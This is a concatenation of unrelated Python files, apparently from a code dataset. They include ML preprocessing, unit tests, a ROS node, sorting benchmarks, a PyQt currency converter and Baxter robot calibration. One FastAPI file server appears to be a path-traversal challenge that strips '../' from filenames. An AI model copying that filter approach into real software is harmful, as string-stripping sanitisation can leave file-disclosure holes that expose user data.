df.workclass = le.fit_transform(df.workclass)
df.education = le.fit_transform(df.education)
df.maritalstatus = le.fit_transform(df.maritalstatus)
df.occupation = le.fit_transform(df.occupation)
df.relationship = le.fit_transform(df.relationship)
df.race = le.fit_transform(df.race)
df.sex = le.fit_transform(df.sex)
df.nativecountry = le.fit_transform(df.nativecountry)
df.salary = le.fit_transform(df.salary)
df_train_cont, df_test_cont = df[:22793], df[22793:]
df_train = df_train_cont[df_train_cont.columns[0:14]]
df_labels = df_train_cont[df_train_cont.columns[14]]
df_test = df_test_cont[df_test_cont.columns[0:14]]
df_test_label = df_test_cont[df_test_cont.columns[14]]
train_matrix = df_train.as_matrix()
trainList = df_train.values.tolist()
trainLabels = df_labels.values.tolist() |
986,946 | 9f9bf15aeb4652b25d9d9057d757ab5244b72786 | import psutil
import sys
import getopt
def analyze(pid):
manager = psutil.Process(pid)
mem_percent = manager.memory_percent()
cpu_percent = manager.cpu_percent(interval=1)
mem_mb = mem_percent * 61.9 * 1024 * 0.01
cpu_core = cpu_percent * 0.01
with open("component_overhead.txt", 'w') as f:
f.write(f'mem_usage: {mem_mb} MB\n')
f.write(f'cpu_usage: {cpu_core} core\n')
if __name__ == '__main__':
opts, args = getopt.getopt(sys.argv[1:],'',['pid='])
for name, value in opts:
if name == '--pid':
pid = value
analyze(int(pid))
|
986,947 | e13ab6f7ad32bf9d069eed7cc46274eb327c2a93 | def updateArray(arr,n,idx,element):
arr.insert(idx, element)
#{
# Driver Code Starts
#Initial Template for Python 3
#contributed by RavinderSinghPB
if __name__ == '__main__':
tcs= int(input())
for _ in range(tcs):
n=int(input())
idx,element=[int(x) for x in input().split()]
arr=[i+1 for i in range(n)]
updateArray(arr,n,idx,element)
print(arr[idx])
# } Driver Code Ends
|
986,948 | 5244c694033884528e956725551c9dd772687316 | from fastapi import FastAPI, HTTPException
from fastapi.responses import RedirectResponse, FileResponse
from os.path import isdir, isfile
from typing import Optional
app = FastAPI()
@app.get('/')
def return_file(filename: Optional[str] = ''):
if not filename:
return RedirectResponse('/?filename=index.html')
filepath = f'./root/{filename}'.replace('../', '').replace('..\\', '').rstrip('/').rstrip('\\')
while '../' in filepath or '..\\' in filepath:
filepath = filepath.replace('../', '').replace('..\\', '')
if filepath.split('.')[-1] not in ('html', 'txt'):
raise HTTPException(
status_code=406,
detail='I will NOT let you open it.'
)
if not isdir(filepath) and isfile(filepath):
return FileResponse(filepath)
raise HTTPException(
status_code=404,
detail=f"Requested file('/{filename}') does not exist."
)
@app.get('/favicon.ico')
def fake_favicon():
return ''
|
986,949 | d1289b5516923f12390a3ba8c14c055d4c406e35 | import unittest
from pubnub.endpoints.presence.get_state import GetState
try:
from mock import MagicMock
except ImportError:
from unittest.mock import MagicMock
from pubnub.pubnub import PubNub
from tests.helper import pnconf, sdk_name
from pubnub.managers import TelemetryManager
class TestGetState(unittest.TestCase):
def setUp(self):
self.pubnub = MagicMock(
spec=PubNub,
config=pnconf,
sdk_name=sdk_name,
uuid=None,
_get_token=lambda: None
)
self.pubnub.uuid = "UUID_GetStateTest"
self.pubnub._telemetry_manager = TelemetryManager()
self.get_state = GetState(self.pubnub)
def test_get_state_single_channel(self):
self.get_state.channels('ch')
self.assertEqual(self.get_state.build_path(), GetState.GET_STATE_PATH % (pnconf.subscribe_key,
"ch",
self.pubnub.uuid))
self.assertEqual(self.get_state.build_params_callback()({}), {
'pnsdk': sdk_name,
'uuid': self.pubnub.uuid,
})
self.assertEqual(self.get_state._channels, ['ch'])
def test_get_state_single_group(self):
self.get_state.channel_groups('gr')
self.assertEqual(self.get_state.build_path(), GetState.GET_STATE_PATH % (pnconf.subscribe_key,
",",
self.pubnub.uuid))
self.assertEqual(self.get_state.build_params_callback()({}), {
'pnsdk': sdk_name,
'uuid': self.pubnub.uuid,
'channel-group': 'gr'
})
assert len(self.get_state._channels) == 0
self.assertEqual(self.get_state._groups, ['gr'])
|
986,950 | 208cc5472475cf334989712613886d1c9e926247 | #! /usr/bin/env python
print("Starting tempnode.py")
import rospy
from std_msgs.msg import String
from azmutils import dynamic_euclid_dist, str_to_obj, obj_to_str
import json
class tempnode():
"""
This class is adapted from theconstructsim.com ROS Basics in 5 Days course - Using Python Classes in ROS
It implements a pseudo action server to move the HSR to coordinate nav goals
provided through the /azm_nav/coord_goal_listener topic
Gives simple result feeback thru /azm_nav/goal_result
"""
def __init__(self):
# Base node inits
rospy.loginfo("Initiating tempnode")
rospy.init_node('tempnode')
self.ctrl_c = False
self.rate = rospy.Rate(10) # 10hz
rospy.on_shutdown(self.shutdownhook)
# Goal publishing inits
self.pub = rospy.Publisher('/azm_nav/semantic_label_additions', String, queue_size=1, latch=True)
self.sub = rospy.Subscriber('/azm_nav/semantic_manual_add', String, self.cb)
self.semantic_goal = rospy.Publisher('/azm_nav/semantic_goal_listener', String, queue_size=1)
self.goal_sub = rospy.Subscriber('/azm_nav/goal_result', String, self.goal_cb)
self.reached = True
def publish_once(self, topic, msg, content="message"):
rospy.loginfo("Attempting to publish {} to {}".format(content, topic.name))
while not self.ctrl_c:
connections = topic.get_num_connections()
if connections > 0:
topic.publish(msg)
rospy.loginfo("Message published to {}".format(topic.name))
break
else:
#rospy.loginfo("No subscribers on {}, sleeping.".format(topic.name))
pass
def cb(self, msg):
_t = {"name":msg.data,"type":"test","coords":[1,2,3],"others":{}}
_msg = String()
_msg.data = obj_to_str(_t)
self.publish_once(self.pub, _msg)
def shutdownhook(self):
# works better than the rospy.is_shutdown()
self.ctrl_c = True
def do_nav_example(self):
goals = ["shelves", "grannyAnnie", "exit"]
stage = 0
stage_done = 0
while not stage_done == len(goals):
if self.reached:
self.reached = False
stage += 1
if stage_done < stage:
msg = String()
msg.data = goals[stage_done]
print("directing robot to {}".format(goals[stage_done]))
self.publish_once(self.semantic_goal, msg, "goal")
stage_done += 1
rospy.sleep(0.5)
print("all goals sent")
def goal_cb(self, msg):
if msg.data == 'success':
print("reached goal")
self.reached = True
else:
print("something went wrong with navigation")
print(msg.data)
if __name__ == '__main__':
print("executing tempnode.py as main")
print("Creating tempnode obj")
tempnode = tempnode()
tempnode.do_nav_example()
print("tempnode.py is spinning")
rospy.spin()
|
986,951 | 39c4065cc55672b67a4712d074bae645ba3387d7 | import csv
from operator import itemgetter
from sort import insertion_sort, merge_sort, heap_sort, quick_sort,bucket_sort,radix_sort
import time
def readFilesAndSort(filenameToSave,algorithm_choice):
filename = filenameToSave+'.csv'
unsorted_csv = open(filename,"r+")
reader = csv.reader(unsorted_csv)
data = []
start_time = time.time()
unsorted_csv.readline()
for row in reader:
data.append([(float)(row[3]),(row[0]),(float)(row[1]),(float)(row[2])])
if algorithm_choice == 1:
merge_sort.merge_sort(data)
end_time = time.time() - start_time
fieldnames_for_csv = ['item_description', 'item_price', 'item_shipping','total_price']
sorted_csv_data = open(filename+"_mergesort.csv","w+")
sorted_data_writer = csv.DictWriter(sorted_csv_data,fieldnames=fieldnames_for_csv)
sorted_data_writer.writeheader()
for items in data:
sorted_data_writer.writerow({'item_description':items[1],'item_price':items[2],'item_shipping':items[3],"total_price":items[0]})
sorted_csv_data.close()
return end_time
if algorithm_choice == 2:
data = quick_sort.quick_sort(data)
end_time = time.time() - start_time
fieldnames_for_csv = ['item_description', 'item_price', 'item_shipping','total_price']
sorted_csv_data = open(filename+"_quicksort.csv","w+")
sorted_data_writer = csv.DictWriter(sorted_csv_data,fieldnames=fieldnames_for_csv)
sorted_data_writer.writeheader()
for items in data:
sorted_data_writer.writerow({'item_description':items[1],'item_price':items[2],'item_shipping':items[3],"total_price":items[0]})
sorted_csv_data.close()
return end_time
if algorithm_choice == 3:
heap_sort.heap_sort(data)
end_time = time.time() - start_time
fieldnames_for_csv = ['item_description', 'item_price', 'item_shipping','total_price']
sorted_csv_data = open(filename+"_heapsort.csv","w+")
sorted_data_writer = csv.DictWriter(sorted_csv_data,fieldnames=fieldnames_for_csv)
sorted_data_writer.writeheader()
for items in data:
sorted_data_writer.writerow({'item_description':items[1],'item_price':items[2],'item_shipping':items[3],"total_price":items[0]})
sorted_csv_data.close()
return end_time
|
986,952 | 1ee0e4c22c84053248de76d947603166669367b7 | import re
def solution(s):
answer = s.lower()
p = re.compile("[\s][a-z]")
answer = p.sub(lambda m: m.group().upper(), answer)
answer = answer[:1].upper() + answer[1:]
return answer
|
986,953 | da741576c63a69e34117a120d1c66a67ea5fff18 | from computer import Computer
def test_case_pt_1():
opcodes = [int(code) for code in "3,0,4,0,99".split(",")]
Computer(opcodes).solve() # prints the value received as the input
def test_case_pt_2():
opcodes = [int(code) for code in "3,9,8,9,10,9,4,9,99,-1,8".split(",")]
Computer(opcodes).solve() # prints "1" if input=8, else "0"
opcodes = [int(code) for code in "3,9,7,9,10,9,4,9,99,-1,8".split(",")]
Computer(opcodes).solve() # prints "1" if input<8, else "0"
opcodes = [int(code) for code in "3,3,1108,-1,8,3,4,3,99".split(",")]
Computer(opcodes).solve() # prints "1" if input=8, else "0"
opcodes = [int(code) for code in "3,3,1107,-1,8,3,4,3,99".split(",")]
Computer(opcodes).solve() # prints "1" if input<8, else "0"
opcodes = [
int(code) for code in "3,12,6,12,15,1,13,14,13,4,13,99,-1,0,1,9".split(",")
]
Computer(opcodes).solve() # prints "1" if input!=0, else "0"
opcodes = [int(code) for code in "3,3,1105,-1,9,1101,0,0,12,4,12,99,1".split(",")]
Computer(opcodes).solve() # prints "1" if input!=0, else "0"
opcodes_str = (
"3,21,1008,21,8,20,1005,20,22,107,8,21,20,1006,20,31,"
+ "1106,0,36,98,0,0,1002,21,125,20,4,20,1105,1,46,104"
+ ",999,1105,1,46,1101,1000,1,20,4,20,1105,1,46,98,99"
)
opcodes = [int(code) for code in opcodes_str.split(",")]
Computer(opcodes).solve()
# prints "999" if input<8, "1000" if input=8, else "1001"
if __name__ == "__main__":
test_case_pt_1()
test_case_pt_2()
with open("05_input", "r") as f:
opcodes = [int(code) for code in f.read().split(",")]
Computer(opcodes, inputs=[1]).solve()
with open("05_input", "r") as f:
opcodes = [int(code) for code in f.read().split(",")]
Computer(opcodes, inputs=[5]).solve()
|
986,954 | 9d56ccde9ef7a52afcb1af5205e229b7d5d17eea | import unittest
from transform import view_transform, scale, translate
from point import Point
from vector import Vector
import matrix
from matrix import Matrix
class TestTransform(unittest.TestCase):
def test_transform1(self):
pfrom = Point(0, 0, 0)
pto = Point(0, 0, -1)
vup = Vector(0, 1, 0)
t = view_transform(pfrom, pto, vup)
I = Matrix([[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]])
self.assertTrue(matrix.equals(I, t))
def test_transform2(self):
pfrom = Point(0, 0, 0)
pto = Point(0, 0, 1)
vup = Vector(0, 1, 0)
t = view_transform(pfrom, pto, vup)
s = scale(-1, 1, -1)
self.assertTrue(matrix.equals(s, t))
def test_transform3(self):
pfrom = Point(0, 0, 8)
pto = Point(0, 0, 0)
vup = Vector(0, 1, 0)
t = view_transform(pfrom, pto, vup)
self.assertTrue(matrix.equals(translate(0, 0, -8), t))
def test_transform4(self):
pfrom = Point(1, 3, 2)
pto = Point(4, -2, 8)
vup = Vector(1, 1, 0)
t = view_transform(pfrom, pto, vup)
m = Matrix([[-0.50709, 0.50709, 0.67612, -2.36643],
[ 0.76772, 0.60609, 0.12122, -2.82843],
[-0.35857, 0.59761, -0.71714, 0.00000],
[ 0.00000, 0.00000, 0.00000, 1.00000]])
self.assertTrue(matrix.equals(m, t))
|
986,955 | d4009345b03eb733a7a61312e7dfde2ece1ff512 | for indice in range (32,36):
print("Tabla del ", indice)
for elemento in range(1,11)
resultado = indice*elemento
print("{2} x {0} = {1}".format(elemnto,resultado,indice))
print()
print()
print("otros valores")
print()
tablas= [21, 34, 54, 65,76]
for indicedice in tablas:
print("Tablas del", indice)
for elemento in range(1,11):
resultado = indice*elemnto
print("{2} x {0} = {1}".format(elemnto,resultado,indice))
print() |
986,956 | 98bd1b6f9006938d67e4de658f213de88af3b43e | """Establishes connection to `.ui` file and loads GUI"""
import os
import sys
import qt5reactor
from PyQt5 import uic
from PyQt5 import QtCore
from PyQt5.QtGui import QIcon, QFont
from PyQt5.QtWidgets import QMainWindow, QApplication, QTableWidgetItem
from twisted.internet import reactor, error
from scrapy import crawler
from Gui import gui_warnings
from Gui.get_path import GUI_DIR, DB_DIR, MAIN_FILE, ICON
from Gui.load_db import create_database, select_records, load_all
from Gui.graphs import Canvas
from currency_scraper.currency_scraper.spiders.investor import InvestorSpider
TITLE = "Currency Converter"
class MainWindow(QMainWindow):
"""Implements logic into static GUI"""
def __init__(self):
super(MainWindow, self).__init__()
uic.loadUi(MAIN_FILE, self)
self.setWindowTitle(TITLE)
self.setWindowIcon(QIcon(ICON))
# string to handle number values
self.arg_nums = []
"""
ADDING FUNCTIONALITY - WIDGET NAMES FOUND INSIDE .UI FILE
"""
# graph, history and title
self.choose_currency.currentTextChanged.connect(self.on_chosen_currency)
self.choose_relation_currency.currentTextChanged.connect(self.on_chosen_relation_currency)
# load currency values and change symbols
self.choose_currency_conversion_top.currentTextChanged.connect(
lambda: self.on_chosen_currency_combobox(self.choose_currency_conversion_top)
)
self.choose_currency_conversion_bottom.currentTextChanged.connect(
lambda: self.on_chosen_currency_combobox(self.choose_currency_conversion_bottom)
)
# determine which label was selected with a click
# logic for buttons is implemented within on_mouse_selected_currency
self.currency_value_top.mouseReleaseEvent = lambda event: self.on_mouse_selected_currency(
event, self.currency_value_top
)
self.currency_value_bottom.mouseReleaseEvent = lambda event: self.on_mouse_selected_currency(
event, self.currency_value_bottom
)
# clear and back buttons have their own functionalities
self.clear_button.clicked.connect(self.on_clear_button)
self.back_button.clicked.connect(self.on_back_button)
# update and delete buttons
self.update_db_button.clicked.connect(self.on_clicked_update)
self.delete_db_button.clicked.connect(gui_warnings.on_clicked_delete)
def on_chosen_currency(self):
"""Shows title, table and graph for selected currency on `choose_currency` combobox"""
main_currency_title = self.choose_currency.currentText()
# the string needs to be modified to be compatible with the database values
main_currency = main_currency_title.replace(" ", "_").lower()
relation_currency = self.choose_relation_currency.currentText().replace(" ", "_").lower()
# graph
if len(load_all(main_currency)) < 2:
gui_warnings.on_loading_values()
else:
try:
canvas = Canvas(relation_currency, self)
canvas.plot(main_currency)
except ValueError:
pass # plots empty graph if main_currency = relation_currency
self.clear_graph_layout(self.graph_layout)
self.graph_layout.addWidget(canvas)
# title
self.gui_title.setText(main_currency_title)
# table
self.currency_table.setRowCount(0)
currency_list = [
"Brazilian Real",
"American Dollar",
"European Euro",
"British Pound",
"Japanese Yen",
"Swiss Frank",
"Canadian Dollar",
"Australian Dollar"
]
for currency in currency_list:
temp = currency_list[currency_list.index(currency)]
currency_list[currency_list.index(currency)] = currency_list[0]
currency_list[0] = temp
if main_currency_title == currency:
self.currency_table.setHorizontalHeaderLabels((*currency_list[1:], "Date"))
# from https://www.youtube.com/watch?v=l2OoXj1Z2hM&t=411s
records = enumerate(load_all(main_currency))
for row_num, row_data in records:
self.currency_table.insertRow(row_num)
for column_num, data in enumerate(row_data):
self.currency_table.setItem(
row_num, column_num, QTableWidgetItem(str(data))
)
def on_chosen_relation_currency(self):
"""
Shows graph for selected currency on `choose_relation_currency` combobox
in relation to selected currency on `choose_currency` combobox
"""
main_currency = self.choose_currency.currentText().replace(" ", "_").lower()
relation_currency = self.choose_relation_currency.currentText().replace(" ", "_").lower()
if len(load_all(main_currency)) < 2:
gui_warnings.on_loading_values()
else:
try:
canvas = Canvas(relation_currency, self)
canvas.plot(main_currency.replace(" ", "_").lower())
except ValueError:
pass
self.clear_graph_layout(self.graph_layout)
self.graph_layout.addWidget(canvas)
# from https://stackoverflow.com/a/10067548/13825145
def clear_graph_layout(self, layout):
while layout.count():
child = layout.takeAt(0)
if child.widget():
child.widget().deleteLater()
def on_chosen_currency_combobox(self, combobox):
"""
Changes currency symbol and loads database value for the currency selected
with the chosen widget
"""
main_currency = combobox.currentText()
main_currency = main_currency.replace(" ", "_").lower()
switch_cases = {
"brazilian_real": "R$",
"american_dollar": "$",
"european_euro": "€",
"british_pound": "£",
"japanese_yen": "¥",
"swiss_frank": "CHF",
"canadian_dollar": "$",
"australian_dollar": "$"
}
case = switch_cases.get(main_currency)
symbol_top = self.currency_value_top.text().split()[0]
symbol_bottom = self.currency_value_bottom.text().split()[0]
if combobox == self.choose_currency_conversion_top:
self.currency_value_top.setText("{} 1.0".format(case))
self.currency_value_bottom.setText("{} 1.0".format(symbol_bottom))
else:
self.currency_value_bottom.setText("{} 1.0".format(case))
self.currency_value_top.setText("{} 1.0".format(symbol_top))
# resetting arg_nums everytime there's a new combobox click
self.arg_nums = []
def on_mouse_selected_currency(self, event, label):
"""
Changes font to bold if currency is selected and passes it to `buttons_logic()`.
"""
font_bold = QFont("Microsoft Sans Serif", 36)
font_bold.setBold(True)
default_font = QFont("Microsoft Sans Serif", 36)
default_font.setBold(False)
label.setFont(font_bold)
if label == self.currency_value_top:
self.currency_value_bottom.setFont(default_font)
else:
self.currency_value_top.setFont(default_font)
self.buttons_logic(label)
# resetting arg_nums everytime there's a new mouse click event
self.arg_nums = []
def buttons_logic(self, label):
"""Disconnects old connection and reconnects button logic to selected currency"""
try:
# from https://stackoverflow.com/a/21587045/13825145
for n in range(0, 10):
getattr(self, "num_{}".format(n)).clicked.disconnect()
self.float_value_button.disconnect()
# if button has not established any connections yet, this error will occur
except TypeError:
pass
# can't use loop because it only computes number 9
self.num_0.clicked.connect(lambda: self.on_number_button_clicked(self.num_0, label))
self.num_1.clicked.connect(lambda: self.on_number_button_clicked(self.num_1, label))
self.num_2.clicked.connect(lambda: self.on_number_button_clicked(self.num_2, label))
self.num_3.clicked.connect(lambda: self.on_number_button_clicked(self.num_3, label))
self.num_4.clicked.connect(lambda: self.on_number_button_clicked(self.num_4, label))
self.num_5.clicked.connect(lambda: self.on_number_button_clicked(self.num_5, label))
self.num_6.clicked.connect(lambda: self.on_number_button_clicked(self.num_6, label))
self.num_7.clicked.connect(lambda: self.on_number_button_clicked(self.num_7, label))
self.num_8.clicked.connect(lambda: self.on_number_button_clicked(self.num_8, label))
self.num_9.clicked.connect(lambda: self.on_number_button_clicked(self.num_9, label))
self.float_value_button.clicked.connect(
lambda: self.on_number_button_clicked(self.float_value_button, label)
)
def on_number_button_clicked(self, button, label):
"""
Adds value typed to the screen and calculates related currency
with values loaded from the database
"""
currency_top = self.choose_currency_conversion_top.currentText()
currency_top = currency_top.replace(" ", "_").lower()
symbol_top = self.currency_value_top.text().split()[0]
currency_bottom = self.choose_currency_conversion_bottom.currentText()
currency_bottom = currency_bottom.replace(" ", "_").lower()
symbol_bottom = self.currency_value_bottom.text().split()[0]
values_top = self.get_values(currency_top)
values_bottom = self.get_values(currency_bottom)
# 0 at index 1 should not be computed again
# and should be overriden if another button is pressed
if button.text() == "0" and self.arg_nums == ["0"]:
pass
elif button.text() != "0" and self.arg_nums == ["0"]:
self.arg_nums[0] = button.text()
elif button.text() == "." and self.arg_nums == []:
self.arg_nums.append("0")
self.arg_nums.append(button.text())
self.arg_nums.append("00")
elif button.text() != "0" and "".join(self.arg_nums) == "0.00":
self.arg_nums[2] = button.text()
else:
self.arg_nums.append(button.text())
arg_string = "".join(self.arg_nums)
try:
if label == self.currency_value_top and 0 < len(self.arg_nums) < 12:
label.setText("{} {}".format(symbol_top, arg_string))
try:
value_bottom = values_top[currency_bottom][0]
self.currency_value_bottom.setText(
"{} {}".format(symbol_bottom, str(round((float(arg_string) * value_bottom), 2)))
)
except TypeError: # if the currency is the same in both comboboxes
self.currency_value_bottom.setText("{} {}".format(symbol_bottom, arg_string))
elif label == self.currency_value_bottom and 0 < len(self.arg_nums) < 12:
label.setText("{} {}".format(symbol_bottom, arg_string))
try:
value_top = values_bottom[currency_top][0]
self.currency_value_top.setText(
"{} {}".format(symbol_top, str(round((float(arg_string) * value_top), 2)))
)
except TypeError:
self.currency_value_top.setText("{} {}".format(symbol_top, arg_string))
except IndexError:
gui_warnings.on_loading_values()
def get_values(self, currency):
"""Creates dict object dynamically depending on value of `currency` argument"""
curr_dict = {
"brazilian_real": None,
"american_dollar": None,
"european_euro": None,
"british_pound": None,
"japanese_yen": None,
"swiss_frank": None,
"canadian_dollar": None,
"australian_dollar": None
}
index = 0
for key in curr_dict:
if key != currency:
# list comprehension to get values from data
curr_dict[key] = [
element for record in select_records(currency, 1) for element in record
if element == record[index] and isinstance(element, float)
]
index += 1
else:
continue
return curr_dict
def on_back_button(self):
"""Erases last digit typed"""
symbol_top = self.currency_value_top.text().split()[0]
symbol_bottom = self.currency_value_bottom.text().split()[0]
try:
if len(self.arg_nums) == 1:
self.currency_value_top.setText("{} 0.0".format(symbol_top))
self.currency_value_bottom.setText("{} 0.0".format(symbol_bottom))
self.arg_nums.pop()
elif len(self.arg_nums) > 12: # max number displayed on screen
self.arg_nums = self.arg_nums[:10]
arg_string = "".join(self.arg_nums)
self.currency_value_top.setText("{} {}".format(symbol_top, arg_string))
self.currency_value_bottom.setText("{} {}".format(symbol_bottom, arg_string))
else:
self.arg_nums.pop()
arg_string = "".join(self.arg_nums)
self.currency_value_top.setText("{} {}".format(symbol_top, arg_string))
self.currency_value_bottom.setText("{} {}".format(symbol_bottom, arg_string))
except IndexError: # if the list is empty
pass
def on_clear_button(self):
"""Clears the screen when the CE button is pressed"""
symbol_top = self.currency_value_top.text().split()[0]
symbol_bottom = self.currency_value_bottom.text().split()[0]
self.currency_value_top.setText("{} 0.0".format(symbol_top))
self.currency_value_bottom.setText("{} 0.0".format(symbol_bottom))
self.arg_nums = []
def on_clicked_update(self):
"""Gives command to run scraper and fetch data from the website"""
process = crawler.CrawlerProcess(
{
"USER_AGENT": "currency scraper",
"SCRAPY_SETTINGS_MODULE": "currency_scraper.currency_scraper.settings",
"ITEM_PIPELINES": {
"currency_scraper.currency_scraper.pipelines.Sqlite3Pipeline": 300,
}
}
)
process.crawl(InvestorSpider)
try:
process.start()
gui_warnings.update_notification()
except error.ReactorNotRestartable:
gui_warnings.warning_already_updated()
def closeEvent(self, event):
"""Default PyQt5 function when closing the program"""
super(MainWindow, self).closeEvent(event)
try:
reactor.stop()
except error.ReactorNotRunning: # if reactor has not been run in the session
pass
def open_window():
"""Initiates instance of the class `MainWindow()` and opens GUI"""
app = QApplication(sys.argv)
window = MainWindow()
window.show()
sys.exit(app.exec_())
if __name__ == "__main__":
create_database()
open_window()
qt5reactor.install()
reactor.run()
|
986,957 | 08d7e126c74d542a4dad027505d6e68ab5492a1d | """Flask App Initialization"""
from flask import Flask
app = Flask(__name__)
from .main import *
|
986,958 | f2b2636943744bb2f8ccd93e9df82d2ea0ef375b | '''
Postprocess the strftime output to remove 0 padding.
''' |
986,959 | c027c55bc068505bde407dfd2b1c4066ba258251 | import tensorflow as tf
import importlib
import random
from preprocess.data_utils import utter_preprocess, is_reach_goal
class Target_Chat():
def __init__(self, agent):
self.agent = agent
self.start_utter = config_data._start_corpus
with tf.Session(config=self.agent.gpu_config) as sess:
self.agent.retrieve_init(sess)
for i in range(int(FLAGS.times)):
print('--------Session {} --------'.format(i))
self.chat(sess)
def chat(self, sess):
history = []
history.append(random.sample(self.start_utter, 1)[0])
target_kw = random.sample(target_set,1)[0]
self.agent.target = target_kw
self.agent.score = 0.
self.agent.reply_list = []
print('START: ' + history[0])
for i in range(config_data._max_turns):
history.append(input('HUMAN: '))
source = utter_preprocess(history, self.agent.data_config._max_seq_len)
reply = self.agent.retrieve(source, sess)
print('AGENT: ', reply)
# print('Keyword: {}, Similarity: {:.2f}'.format(self.agent.next_kw, self.agent.score))
history.append(reply)
if is_reach_goal(history[-2] + history[-1], target_kw):
print('Successfully chat to the target \'{}\'.'.format(target_kw))
return
print('Failed by reaching the maximum turn, target: \'{}\'.'.format(target_kw))
if __name__ == '__main__':
flags = tf.flags
# supports kernel / matrix / neural / retrieval / retrieval-stg
flags.DEFINE_string('agent', 'kernel', 'The agent type')
flags.DEFINE_string('times', '100', 'Conversation times')
FLAGS = flags.FLAGS
config_data = importlib.import_module('config.data_config')
config_model = importlib.import_module('config.' + FLAGS.agent)
model = importlib.import_module('model.' + FLAGS.agent)
predictor = model.Predictor(config_model, config_data, 'test')
target_set = []
for line in open('tx_data/test/keywords.txt', 'r').readlines():
target_set = target_set + line.strip().split(' ')
Target_Chat(predictor)
|
986,960 | 1a050bbefcc1dd2d7aed70c219d2a9f54a3f1c32 | #檢查檔案
import os #operating system 必須載入作業系統
products = [] #不管是否有找到都先使用空清單
if os.path.isfile('products.csv'): #相對路徑or 絕對路徑
#詢問作業系統此檔案是否在同資料夾中
print('是的,找到檔案')
#讀取檔案
with open('products.csv','r' , encoding='utf-8') as f:
for line in f:
if '商品,價格' in line:
continue #跳過,繼續下個迴圈
s = line.strip().split(',')
# print(name,price)
products.append([s])
print(products)
else:
print('否,找不到檔案')
#讓使用者輸入
products = []
while True:
name = input('請輸入商品名稱:')
if name == 'q':
break
price = input('請輸入商品價格:')
p = [name , price] #一次一次的裝入清單
products.append(p) #每次裝完清單就append進入大清單的車廂
print(products)
print(products[0][0])
for a in products: #用a一次又一次的從清單拿出來
print(a)
#清單寫入文件裡
with open('products.csv','w' , encoding='utf-8') as f:
f.write('商品,價格\n')
for p in products:
f.write(p[0] + ',' + p[1] + '\n')
|
986,961 | babdf1ae67bb42394c184aaca30c0d71fd120d45 | import unittest
from models import movie
Movie=movie.Movie
class MovieTest(unittest.TestCase):
def setUp(self):
self.new_movie=Movie(1234,'bad boys','awsome','https://ww.image.com',5.6,12345)
def test_instance(self):
self.assertTrue(isinstance(self.new_movie,Movie))
if __name__ == '__main__':
unittest.main() |
986,962 | 8c33b1e1b937424aa690161666ea198b6866d94f | # proxy module
from __future__ import absolute_import
from apptools.preferences.ui.tree_item import *
|
986,963 | abb238333619e1547904e3969868c81bbdc914a7 | '''
Created on Jun 16, 2015
@author: baxter
'''
#!/usr/bin/env python
import roslib;
import rospy
import os,inspect
import time
import cv2
import numpy as np
from .homography import *
from .baxter import *
from geometry_msgs.msg import Point, PointStamped
from _dbus_bindings import String
from sys import argv
from decimal import *
# Global variables:
H = [] # The current homography matrix.
Z = 0 # The Z coordinate of the table.
baxter = Baxter() # The object that controls Baxter. Defined in baxter.py.
floor_reference_points = [] # The floor reference points.
floor_reference_orientations = [] # The floor reference orientations.
n_clicks = 0
tot_clicks = 4
points = []
filename = argv
original_position = None
current_position = None
def initial_setup_baxter():
"""
Enable and set up baxter.
"""
#print 'Initializing node...'
#rospy.init_node('baxter_or')
baxter.enable()
baxter.calibrateLeftGripper()
def on_mouse_click(event, x, y, flag, param):
global n_clicks, points
if event == cv2.EVENT_LBUTTONDOWN:
print('Point %s captured: (%s,%s)' % (n_clicks+1,x,y))
points.append([x, y])
n_clicks += 1
def get_img_reference_points():
"""
This function get 4 points of reference from the image from the right hand
of baxter. Returns an array of size 4, with 4 coordinates:
[[x1,y1], [x2,y2], [x3,y3], [x4,y4]].
TODO: implement this. We have to define a color we will mark the table
and get 4 points of that color from the image.
"""
# The following line is just for test.
input('Enter to capture image.')
image = baxter.getImageFromRightHandCamera()
cvimage = baxter.getLastCvImage()
while n_clicks <= tot_clicks-1:
# displays the image
cv2.imshow("Click", cvimage)
#cv.ShowImage("Click", cvimage)
#calls the callback function "on_mouse_click'when mouse is clicked inside window
cv2.setMouseCallback("Click", on_mouse_click, param=1)
#cv.SetMouseCallback("Click", on_mouse_click, param=1)
#cv.WaitKey(1000)
cv2.waitKey(1000)
#print points
cv2.destroyAllWindows()
return points
def get_floor_reference_points():
"""
This function get 4 points of reference from the real world, asking the
user to move the baxter arm to the position of each corresponding point
in the image, and then getting the X,Y and Z coordinates of baxter's hand.
Returns an array of size 4 containing 4 coordinates:
[[x1,y1], [x2,y2], [x3,y3], [x4,y4]].
All the coordinates Z should be approximatelly the same. We assume the table
is niveled. Save the Z coordinate in the global variable.
TODO: Implement this. Figure out a way to get the end position of baxter
hand. I know that in baxter_msgs
"""
global Z # This declaration is needed to modify the global variable Z
global floor_reference_points # Maybe erase.
global floor_reference_orientations # Maybe erase.
#Z = (-0.04311285564353425 -0.04512672573083166 -0.04080078888404003 -0.046071914959185875)/4
#Z= -0.04721129960500225
Z = -0.15113003072395247
print(Z)
# [0.5264201148167275, 0.40034933311487086, -0.027560670871152958]
# Point 1 = [0.5264201148167275, 0.40034933311487086, -0.027560670871152958]
# Move the LEFT arm to point 2 and press enter.
# Move the LEFT arm to point 3 and press enter.
# Point 3 = [0.8164126163781988, 0.00011724257622775782, -0.006060458646583389]
# Move the LEFT arm to point 4 and press enter.
# Point 4 = [0.5774338486223564, -0.02912627450728407, -0.02923769860966796]
# Point 1 = [0.45835412247904794, 0.4167330917312844, -0.11362745036843477]
# Move the LEFT arm to point 2 and press enter.
# Point 2 = [0.7046556740624649, 0.45390428836232344, -0.11322759071560898]
# Move the LEFT arm to point 3 and press enter.
# Point 3 = [0.7778487250094798, 0.07406413897305184, -0.11181591166991744]
# Move the LEFT arm to point 4 and press enter.
# Point 4 = [0.5418466718761972, 0.034360381218309734, -0.11464607923115094]
#return [[p1[0],p1[1]], [p2[0],p2[1]], [p3[0],p3[1]], [p4[0],p4[1]]]
#print p4
filename = "/home/sampath/midca/examples/_gazebo_baxter/calibration.txt"
f = open(filename, 'r')
p1 = f.readline().split(' ')
p2 = f.readline().split(' ')
p3 = f.readline().split(' ')
p4 = f.readline().split(' ')
p1[0] = float(p1[0])
p1[1] = float(p1[1])
p2[0] = float(p2[0])
p2[1] = float(p2[1])
p3[0] = float(p3[0])
p3[1] = float(p3[1])
p4[0] = float(p4[0])
p4[1] = float(p4[1])
return [[p1[0], p1[1]],
[p2[0], p2[1]],
[p3[0], p3[1]],
